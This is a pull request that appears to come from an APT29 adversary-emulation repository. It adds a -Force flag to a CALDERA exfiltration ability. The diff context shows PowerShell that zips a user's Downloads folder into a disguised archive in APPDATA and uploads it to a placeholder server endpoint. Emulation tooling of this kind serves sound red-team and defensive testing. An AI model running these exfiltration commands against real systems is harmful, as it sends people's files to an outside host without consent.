### PR TITLE
Force compression when destination path exists

### DIFF
--- a/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/a612311d-a802-48da-bb7f-88a4b9dd7a24.yml
+++ b/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/a612311d-a802-48da-bb7f-88a4b9dd7a24.yml
@@ -13,7 +13,7 @@
         command: |
 
           Write-Host "[*] Compressing all the things in download dir";
-          Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip";
+          Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -Force -DestinationPath "$env:APPDATA\OfficeSupplies.zip";
 
           Import-Module .\upload.ps1 -Verbose -Force;
           Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload";


### PR DESCRIPTION
The `Compress-Archive` command might fail if OfficeSupplies.zip exists.

We can overwrite the original file with the `-Force` parameter.